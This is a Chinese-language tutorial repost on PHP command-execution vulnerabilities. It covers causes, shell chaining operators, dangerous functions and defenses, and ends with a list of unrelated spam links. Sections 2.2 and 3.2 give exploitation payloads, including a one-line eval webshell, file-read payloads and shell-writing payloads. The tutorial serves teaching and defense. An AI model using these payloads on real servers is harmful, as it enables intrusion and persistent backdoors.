当前位置: 首页 > news >正文

贵阳网站建设zu97东莞做网站的联系电话

贵阳网站建设zu97,东莞做网站的联系电话,医院网站建设 中企动力,做网站需要知道哪些事情文章目录 一、命令执行概述1.1 基本定义1.2 原理1.3 两个条件1.4 命令执行漏洞产生的原因1.5 管道符号和通用命令符 二、远程命令执行2.1 远程命令执行相关函数2.2 远程命令执行漏洞的利用 三、系统命令执行3.1 相关函数3.2 系统命令执行漏洞利用 四、命令执行漏洞防御 一、命令…

文章目录

  • 一、命令执行概述
    • 1.1 基本定义
    • 1.2 原理
    • 1.3 两个条件
    • 1.4 命令执行漏洞产生的原因
    • 1.5 管道符号和通用命令符
  • 二、远程命令执行
    • 2.1 远程命令执行相关函数
    • 2.2 远程命令执行漏洞的利用
  • 三、系统命令执行
    • 3.1 相关函数
    • 3.2 系统命令执行漏洞利用
  • 四、命令执行漏洞防御

一、命令执行概述

1.1 基本定义

命令执行漏洞是指攻击者可以随意执行系统命令,分为远程命令执行(远程代码执行)和系统命令执行两类。

1.2 原理

  应用程序有时需要调用一些执行系统命令的函数,如PHP中的systemexecshell_execpassthrupopenproc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。

1.3 两个条件

  • 用户能够控制函数的输入
  • 存在可以执行代码或者系统命令的危险函数

1.4 命令执行漏洞产生的原因

  • 由于开发人员编写源码时,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交而已构造语句,并提交服务器执行。
  • 命令注入攻击中,web服务器没有过滤类似systemevalexec等函数,是该漏洞攻击成功的主要原因。

1.5 管道符号和通用命令符

(1)Linux

  • <command 1>;<command 2>命令1执行完,再执行命令2。
  • <command 1> | <command 2>是管道符,命令1的结果作为命令2的输入,直接执行命令2,显示命令2的执行结果。
  • <command 1> || <command 2>当命令1执行出错时,执行命令2。

(2)Windows

  • <command 1> & <command 2>:命令1是否假,都执行命令2。
  • <command 1> && <command 2>:命令1为假直接报命令1的错误,命令2不会被执行。
  • <command 1> | <command 1>:直接执行命令2,显示命令2的执行结果。
  • <command 1> || <command 2>当命令1执行出错时,执行命令2.

(3)通用命令符

  • <command 1> | <command 1>:命令1的结果作为命令2的输入,直接执行命令2,显示命令2的执行结果。
  • <command 1> & <command 2>:命令1和命令2之间不相互影响;
  • <command 1> && <command 2>:命令1为假直接报命令1的错误,命令2不会被执行。

二、远程命令执行

2.1 远程命令执行相关函数

  在PHP中,允许命令执行的函数有:eval()assert()preg_replace()call_user_func()$a($b)。如果页面中存在这些函数并且对用户的输入没有做严格的过滤,那么就有可能造成远程命令执行漏洞。

2.2 远程命令执行漏洞的利用

(1)?a=@eval($_POST[666]); //一句话木马
在这里插入图片描述

(2)?a=print(_FILE_); //获取当前绝对路径
在这里插入图片描述

(3)?a=var_dump(file_get_contents('<file_path>')); //读取文件
在这里插入图片描述

(4)?a=var_dump(file_put_contents($_POST[1],$_POST[2])); //写shell
在这里插入图片描述

三、系统命令执行

3.1 相关函数

  允许系统命令执行的函数有:system()exec()shell_exec()passthru()popen()反引号

3.2 系统命令执行漏洞利用

(1)?a=type <file_path> //查看文件
在这里插入图片描述

(2)?a=cd //查看当前绝对路径
在这里插入图片描述

(3)?a=echo "<?php phpinfo();?>" > <file_path> //写shell
在这里插入图片描述

四、命令执行漏洞防御

  • 尽量不要执行外部命令
  • 使用escapeshellarg函数来处理命令参数,escapeshellarg函数会将任何引起参数或命令结束的字符转义;
  • 使用safe_mode_exec_dir指定要执行程序的主目录(php.ini),该函数会将要使用的命令提前放入此路径内。
http://www.khdw.cn/news/13036.html

相关文章:

  • 北京专业网站翻译影音字幕翻译速记速记速记速而高效外贸平台排名
  • 图片网站怎么做郑州网络营销公司哪家好
  • 自己做网站需要哪些流程营销策略从哪几个方面分析
  • 字体设计软件廊坊优化外包
  • 服务器两个域名一个ip做两个网站吗上海优化外包公司排名
  • wordpress comments.php大连网站seo
  • 婚纱网站html模板北京网络营销招聘
  • 怎样做网站管理武汉seo引擎优化
  • 太仓做网站的公司比较好的品牌策划公司有哪些
  • 网站需要去工信部做备案常德seo招聘
  • 做阿里巴巴网站多少钱百度搜索指数和资讯指数
  • 麻涌镇网站建设线上推广费用预算
  • 如何做网站站内搜索白度指数
  • 网站项目申报书建设规模网络营销个人感悟小结
  • 做网站可以卖钱吗营销型网站更受用户欢迎的原因是
  • 给公司做网站和公众号需要多少钱网上营销网站
  • 平面设计公司企业logo设计广州seo推荐
  • 网站设计找谁做关键词排名优化技巧
  • 在线网站软件免费下载seo搜索引擎排名优化
  • 如何设计一个企业网站网站建设的技术支持
  • 企业网站模块介绍seo工作内容有哪些
  • 网上做网站 干对缝儿生意网络广告策划与制作
  • 网站备案期间可以用二级域名访问网站吗怎样优化网站关键词排名靠前
  • 广州免费建站找哪家个人博客seo
  • 手机商城网站开发百度营销推广靠谱吗
  • 商城网站 搭建湖南网络优化
  • 佛山优化网站广告公司简介
  • 一 一个甜品网站建设目标北京网站排名推广
  • 现代农业建设 乡网站官方百度平台
  • 网站定制 天津外贸营销型网站